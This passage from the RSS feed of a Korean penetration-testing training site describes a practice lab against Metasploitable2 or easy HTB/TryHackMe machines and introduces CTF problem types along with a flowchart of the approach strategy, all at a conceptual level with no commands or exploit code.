첫 단계.&lt;/a&gt;" data-bs-toggle="tooltip" href="https://whacker.metacog.co.kr/docs/recon/"&gt;정찰&lt;/a&gt;·&lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/network/'&gt;&lt;p&gt;개요&lt;/p&gt;&lt;strong&gt;네트워크 &amp; 인프라&lt;/strong&gt;&lt;br&gt;네트워크 서비스 공격, 스니핑, 무선 보안.&lt;/a&gt;" data-bs-toggle="tooltip" href="https://whacker.metacog.co.kr/docs/network/"&gt;네트워크&lt;/a&gt;·&lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/system/'&gt;&lt;p&gt;개요&lt;/p&gt;&lt;strong&gt;시스템 &amp; 포스트 익스플로잇&lt;/strong&gt;&lt;br&gt;발판 확보 이후 — 권한상승, 지속성, 측면이동.&lt;/a&gt;" data-bs-toggle="tooltip" href="https://whacker.metacog.co.kr/docs/system/"&gt;시스템&lt;/a&gt; 영역을
하나로 잇는 실습이다. &lt;strong&gt;Metasploitable2&lt;/strong&gt; 또는 &lt;strong&gt;TryHackMe/HTB의 Easy 박스&lt;/strong&gt;를
대상으로 진행한다.&lt;/p&gt;
&lt;h2 id="c1-scan"&gt;문제 1 — 열린 문 찾기 🟢 &lt;a href="#c1-scan" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;목표&lt;/strong&gt;: 대상의 전체 포트를 스캔하고, 열린 서비스와 버전을 표로 정리한다.&lt;/p&gt;
&lt;details&gt;&lt;summary&gt;💡 힌트&lt;/summary&gt;
&lt;ul&gt;
&lt;li&gt;빠른 전체 포트 스캔 후, 발견된 포트만 정밀 스캔하는 2단계 접근이 효율적이다.&lt;/li&gt;
&lt;li&gt;참고: &lt;a data-bs-delay="{&amp;#34;hide&amp;#34;:300,&amp;#34;show&amp;#34;:550}" data-bs-html="true" data-bs-title="&lt;a href='https://whacker.metacog.co.kr/docs/recon/scanning-enumeration/'&gt;&lt;p&gt;정찰&lt;/p&gt;</description></item><item><title>CTF 종합 문제</title><link>https://whacker.metacog.co.kr/docs/labs/ctf-comprehensive/</link><pubDate>Sun, 23 Aug 2026 00:00:00 +0000</pubDate><guid>https://whacker.metacog.co.kr/docs/labs/ctf-comprehensive/</guid><description>&lt;p&gt;CTF(Capture The Flag)는 숨겨진 플래그를 찾는 실전형 문제 풀이다. 정찰부터
익스플로잇까지 여러 기법을 창의적으로 결합하는 능력을 기른다.&lt;/p&gt;
&lt;h2 id="types"&gt;CTF 유형 &lt;a href="#types" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;유형&lt;/th&gt;
 &lt;th&gt;내용&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Web&lt;/td&gt;
 &lt;td&gt;웹 취약점 익스플로잇&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Pwn(바이너리)&lt;/td&gt;
 &lt;td&gt;메모리 손상·익스플로잇 개발&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Reversing&lt;/td&gt;
 &lt;td&gt;바이너리 역공학&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Crypto&lt;/td&gt;
 &lt;td&gt;암호 취약점&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Forensics&lt;/td&gt;
 &lt;td&gt;디스크·메모리·패킷 분석&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Boot2Root&lt;/td&gt;
 &lt;td&gt;머신 하나를 root까지&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="strategy"&gt;접근 전략 &lt;a href="#strategy" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;pre class="mermaid"&gt;flowchart TD
 A[문제 이해&amp;lt;br/&amp;gt;제공된 자원 파악] --&amp;gt; B[전 방향 열거]
 B --&amp;gt; C{취약 지점?}
 C --&amp;gt;|웹| D[입력·엔드포인트 테스트]
 C --&amp;gt;|서비스| E[버전·설정 오류]
 C --&amp;gt;|파일| F[정적/동적 분석]
 D --&amp;gt; G[익스플로잇]
 E --&amp;gt; G
 F --&amp;gt; G
 G --&amp;gt; H[플래그 획득 &amp;#43; 기록]
&lt;/pre&gt;
&lt;h2 id="self-check"&gt;자가 점검 문제 &lt;a href="#self-check" class="anchor" aria-hidden="true"&gt;&lt;i class="material-icons align-middle"&gt;link&lt;/i&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;개념이 잡혔는지 스스로 확인한다.&lt;/p&gt;</description></item></channel></rss>